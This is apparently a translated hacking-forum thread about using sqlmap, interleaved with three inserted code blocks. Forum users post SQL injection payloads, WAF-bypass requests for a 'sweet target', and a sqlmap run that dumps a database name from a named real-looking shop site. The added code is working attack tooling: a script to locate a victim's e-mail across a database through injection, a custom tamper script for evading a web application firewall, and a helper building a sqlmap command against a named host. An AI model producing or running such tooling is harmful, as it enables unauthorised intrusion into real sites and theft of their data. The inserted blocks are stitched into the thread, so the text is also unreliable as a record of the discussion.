Questions about SQLMap

Discussion in 'Vulnerabilities' (Уязвимости) started by randman, 1 Oct 2015.

  1. brown (Member, joined 16 Oct 2016)
    [08:04:48] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests

    How can this be bypassed?

    [08:04:48] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
    [08:06:18] [CRITICAL] connection timed out to the target URL
    [08:06:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
    [08:08:19] [CRITICAL] connection timed out to the target URL
    [08:08:19] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable (with --string="write")
    [08:08:19] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
    [08:08:19] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
    [08:08:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
    [08:10:19] [CRITICAL] connection timed out to the target URL
    [08:10:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
    [08:12:19] [CRITICAL] connection timed out to the target URL
    [08:12:19] [WARNING] false positive or unexploitable injection point detected
    [08:12:19] [WARNING] URI parameter '#1*' does not seem to be injectable

    The WAF won't let the SQLi through.
     
  2. ex3x1 (New Member, joined 14 Sep 2019)
    Good day! For example, I know the DB contains a row with the e-mail [email protected], but I don't know the table or column name, since they have random names like "dfdwydponefdxb". How do I search the whole DB and find which table holds the row with [email protected]?
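Added example for the question above (my own code, not from the thread or from sqlmap): when table and column names are random, sqlmap's --search with -C only matches column names, so the practical approach is to read the database catalog and probe every text column for the value. The script walks a constructed SQLite database so it runs offline (PRAGMA table_info stands in for information_schema.columns) and separately emits the MySQL/MariaDB statements you would push through sqlmap's --sql-query or --sql-file. The e-mail address, table and column names are constructed, and the MySQL part assumes information_schema is readable from the injection point.

```python
"""
Locate which table/column holds a known value when names are random:
walk the catalog instead of guessing names.
"""
import sqlite3

NEEDLE = "victim@example.com"  # constructed stand-in for the real address


def build_demo_db():
    """Constructed schema with the kind of random names the post describes."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE dfdwydponefdxb (id INTEGER, qzplmw TEXT, hvtrke TEXT);
        CREATE TABLE kxqothwvazul  (id INTEGER, payload TEXT);
        INSERT INTO dfdwydponefdxb VALUES (1, 'someone@example.org', 'x');
        INSERT INTO dfdwydponefdxb VALUES (2, 'victim@example.com', 'y');
        INSERT INTO kxqothwvazul  VALUES (7, 'nothing here');
        """
    )
    return conn


def text_columns_sqlite(conn):
    """Catalog walk; PRAGMA table_info stands in for information_schema.columns."""
    cols = []
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'"
    ).fetchall()
    for (table,) in tables:
        pragma = 'PRAGMA table_info("%s")' % table.replace('"', '""')
        for row in conn.execute(pragma):
            cols.append((table, row[1]))  # row[1] is the column name
    return cols


def find_value(conn, needle):
    """Probe every column for an exact match; return (table, column, hits)."""
    hits = []
    for table, column in text_columns_sqlite(conn):
        sql = 'SELECT COUNT(*) FROM "%s" WHERE "%s" = ?' % (
            table.replace('"', '""'), column.replace('"', '""'))
        (n,) = conn.execute(sql, (needle,)).fetchone()
        if n:
            hits.append((table, column, n))
    return hits


# --- MySQL/MariaDB side: statements for sqlmap --sql-query / --sql-file ---

def mysql_column_list_query():
    """Step 1: list candidate columns (assumes information_schema is readable)."""
    return ("SELECT table_name, column_name FROM information_schema.columns "
            "WHERE table_schema = DATABASE() "
            "AND data_type IN ('varchar','char','text','tinytext',"
            "'mediumtext','longtext')")


def mysql_probe_statements(columns, needle):
    """Step 2: one probe per (table, column) pair returned by step 1."""
    lit = needle.replace("\\", "\\\\").replace("'", "''")
    return ["SELECT COUNT(*) FROM `%s` WHERE `%s` = '%s'"
            % (t.replace("`", "``"), c.replace("`", "``"), lit)
            for t, c in columns]


if __name__ == "__main__":
    db = build_demo_db()
    print(find_value(db, NEEDLE))
    print(mysql_column_list_query())
    for stmt in mysql_probe_statements([("dfdwydponefdxb", "qzplmw")], NEEDLE):
        print(stmt)
```

Each probe is one query, so through a blind injection this costs one sqlmap --sql-query per column; narrowing the step-1 list by data type (or by column length, if the address is long) keeps the count manageable, and --sql-file lets you run the generated list in one session.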
     
  3. sysjuk (Member, joined 5 Jan 2012)
    Good evening, guys. A topical question: is there maybe a ready-made tamper for the Imunify360 (CloudLinux) WAF, or could one take something ready-made and rewrite it?
    A sweet target has turned up))
    Happy upcoming New Year 2022 to everyone.
     
  4. brown (Member, joined 16 Oct 2016)
    Code:
    Parameter: JSON #1* ((custom) POST)
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
        Payload: {"username":"test' AND UPDATEXML(7256,CONCAT(0x2e,0x716a7a7071,(SELECT (ELT(7256=7256,1))),0x71627a7671),5155) AND 'kFiU'='kFiU","password":"test"}

        Vector: AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
    ---
    [12:20:48] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 7.2.34
    back-end DBMS: MySQL >= 5.1
    [12:20:48] [INFO] fetching database names
    [12:20:48] [PAYLOAD] test' AND UPDATEXML(3717,CONCAT(0x2e,0x716a7a7071,(SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8364) AND 'BbsS'='BbsS
    [12:20:49] [WARNING] the SQL query provided does not return any output
    [12:20:49] [INFO] falling back to current database
    [12:20:49] [INFO] fetching current database
    [12:20:49] [PAYLOAD] test' AND UPDATEXML(9975,CONCAT(0x2e,0x716a7a7071,(MID((DATABASE()),1,22)),0x71627a7671),9057) AND 'rvrx'='rvrx
    [12:20:49] [DEBUG] performed 1 query in 0.65 seconds
    [12:20:49] [CRITICAL] unable to retrieve the database names
     
  5. exe-world (New Member, joined 6 May 2022)
    Guys, help me with how to feed this into sqlmap.
    There is a bug: site.de/index.php?view_id=-11'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
    It works and prints the database name, but sqlmap doesn't see the link as vulnerable; I tried various tampers too, it just shows 403 in the sqlmap log.
    By hand I can get the version, 10.2.43-MariaDB-cll-lve, and I can get the user.
     
  6. karkajoi (Well-Known Member, joined 26 Oct 2016)
    Looks very much like ModSecurity; you need to either find a tamper or rework the existing ones. Here is the bypass thread: https://forum.antichat.com/threads/425295/
     
  7. eminlayer7788 (Member, joined 31 Jul 2015)
    What MySQL version?

    https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
     
  9. exe-world (New Member, joined 6 May 2022)
    I tried it the way the author does, from {f information_schema.tables}: it blocks, returns 403 and that's it.
    Simply '+/*!12345UNION*/+/*!12345SELECT*/+1,{f version()},3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ works, the version is displayed.
    I tried it by hand the way the author does here.
    Also just a block. Maybe it's not ModSecurity? Although it certainly looks a lot like it.
     
  10. eminlayer7788 (Member, joined 31 Jul 2015)
    Test the versionedkeywords, between and unionalltounion tamper scripts together.
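Added example, not part of the thread and not one of sqlmap's own tamper scripts: a custom tamper that reproduces the exact payload shape exe-world reports as getting past the filter by hand in posts 5 and 9 (each keyword inside a MySQL versioned comment with an explicit 5-digit version, spaces sent as '+'). The built-in tampers suggested in posts 10 and 13 each emit a different shape, which is one reason a hand payload and sqlmap's output can behave differently against the same rule set. The version string 12345, the keyword list and the file name are assumptions; the file goes into sqlmap's tamper/ directory and is loaded with --tamper=versioned12345 (it can be chained with others such as between).

```python
#!/usr/bin/env python
"""
versioned12345.py - custom sqlmap tamper script (example code, not shipped
with sqlmap).  Turns

    1' UNION SELECT 1,database(),3-- -
into
    1'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3--+-
"""
import re

try:
    from lib.core.enums import PRIORITY  # present when sqlmap loads the script
    __priority__ = PRIORITY.HIGHEST
except ImportError:  # stand-alone use, e.g. unit-testing the transformation
    __priority__ = 0

VERSION = "12345"  # assumption: copied from the payload that worked by hand

# Keywords to hide.  Function names are deliberately left out: MySQL wants the
# '(' to follow a function name directly, and this script does not rely on a
# comment being tolerated in that position.
KEYWORDS = ("UNION", "ALL", "DISTINCT", "SELECT", "FROM", "WHERE", "AND", "OR",
            "NOT", "ORDER", "GROUP", "BY", "HAVING", "LIMIT", "AS", "LIKE",
            "IN", "IS", "NULL")

# \b keeps partial words (e.g. 'ORxy' inside sqlmap's random strings) intact;
# the look-behind avoids double-wrapping when chained after versionedkeywords.
_KW_RE = re.compile(r"(?<!/\*!)\b(%s)\b" % "|".join(KEYWORDS), re.IGNORECASE)


def dependencies():
    pass


def tamper(payload, **kwargs):
    """
    Wraps keywords in /*!12345...*/ and replaces spaces with '+'.

    >>> tamper("1' UNION SELECT 1,database(),3-- -")
    "1'+/*!12345UNION*/+/*!12345SELECT*/+1,database(),3--+-"
    """
    if not payload:
        return payload
    wrapped = _KW_RE.sub(lambda m: "/*!%s%s*/" % (VERSION, m.group(1)), payload)
    # '+' only decodes to a space in a URL query string.  For a POST or JSON
    # body return `wrapped` as is and chain space2comment instead.
    return wrapped.replace(" ", "+")
```

The '+' half is what sqlmap's space2plus already does; it is kept here so the output matches the hand payload byte for byte. When the rule set still blocks a specific identifier (post 9 reports information_schema.tables being caught), extending KEYWORDS is the place to experiment, but nothing in the thread confirms that wrapping that name works on this target.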
     
  11. exe-world (New Member, joined 6 May 2022)
    [13:53:45] [CRITICAL] all tested parameters do not appear to be injectable
    [13:53:45] [WARNING] HTTP error codes detected during run:
    403 (Forbidden) - 3438 times, 501 (Not Implemented) - 12 times
    Unfortunately, the tamper didn't help.
     
  12. eminlayer7788 (Member, joined 31 Jul 2015)
    Send me your target link via PM.
     
  13. eminlayer7788 (Member, joined 31 Jul 2015)
    python3 sqlmap.py -u "https://mkeducationalsupplies.com.au/viewproduct.php?productid=364*" --level=4 --risk=3 --random-agent --batch --dbs --tamper=between,modsecurityversioned,randomcase,space2comment,unionalltounion --fresh-queries

    available databases [1]:
    [*] mkeducat_books2019
     
  14. eminlayer7788 (Member, joined 31 Jul 2015)
    What is wrong with this request?

    python3 sqlmap.py -u "http://stat.com/service.php" -p 'type' --risk="3" --level="3" --method="POST" --data='{"appFrom":"","appId":"","appName":"City","module":"install-broadcast","op":"setup","packageAppName":"ar.ity","position":"","type":"0","action":"postyyt","channelId":"cdy5e1e1a","mac":"F4:9y3:9F:F8:2A:80","marketVersion":"launcher_5.0.8","userName":"-1","version":"6.2.1"}' --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36" --headers="Host:stat.com\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nConnection:Close\nContent-Type:application/json;charset=UTF-8" --dbms="MySQL" --batch

    [05:55:43] [CRITICAL] all testable parameters you provided are not present within the given request data #5108

    P.S. I also checked "type" and 'type', both in -p and in the request data.

    P.P.S. sqlmap -r request.txt doesn't work in this case either (and this payload is workable, because another scanner can execute the SQL query with this payload).
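Added example for the request above (my own code, not from the thread or from sqlmap): instead of naming the JSON field with -p, sqlmap's custom injection marker '*' can be placed on the value itself, which is the form post 4 in this thread shows working for a JSON body (sqlmap reported it as `Parameter: JSON #1* ((custom) POST)`). The helper keeps the body valid JSON, so the marker has to sit inside the string's quotes, and re-serialises it without whitespace. The body, URL and header values are copied from the post; the function names are my own, and --batch is assumed so that sqlmap's prompt about processing the marker is auto-answered.

```python
"""Build a sqlmap command line for a JSON POST body using the '*' marker."""
import json
import shlex

# Body copied from the post above.
BODY = ('{"appFrom":"","appId":"","appName":"City","module":"install-broadcast",'
        '"op":"setup","packageAppName":"ar.ity","position":"","type":"0",'
        '"action":"postyyt","channelId":"cdy5e1e1a","mac":"F4:9y3:9F:F8:2A:80",'
        '"marketVersion":"launcher_5.0.8","userName":"-1","version":"6.2.1"}')

HEADERS = [  # copied from the post; joined with a literal \n as --headers expects
    "Host: stat.com",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Accept-Encoding: gzip, deflate",
    "Accept-Language: en-us,en;q=0.5",
    "Cache-Control: no-cache",
    "Connection: Close",
    "Content-Type: application/json;charset=UTF-8",
]


def mark_json_value(body, key, marker="*"):
    """Return `body` with `marker` appended to the string value of `key`.

    Only string values are accepted: putting '*' after a bare number would
    break the JSON and the application would reject the request before the
    payload ever reaches the query.
    """
    obj = json.loads(body)
    if key not in obj:
        raise KeyError("no such key in body: %r" % key)
    if not isinstance(obj[key], str):
        raise TypeError("only string values can carry the marker: %r" % key)
    obj[key] = obj[key] + marker
    # compact separators reproduce the body exactly as the app sent it
    return json.dumps(obj, separators=(",", ":"))


def sqlmap_argv(url, body, headers, dbms="MySQL"):
    """argv for sqlmap; no -p, the '*' in `body` selects the injection point."""
    return [
        "python3", "sqlmap.py",
        "-u", url,
        "--method", "POST",
        "--data", body,
        "--headers", "\\n".join(headers),
        "--dbms", dbms,
        "--risk", "3", "--level", "3",
        "--batch",
    ]


if __name__ == "__main__":
    marked = mark_json_value(BODY, "type")
    print(shlex.join(sqlmap_argv("http://stat.com/service.php", marked, HEADERS)))
```

Running it prints a paste-able command in which only "type":"0*" differs from the original body; shlex.join takes care of quoting the JSON for the shell, which is where hand-built single-quoted --data arguments often go wrong.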
     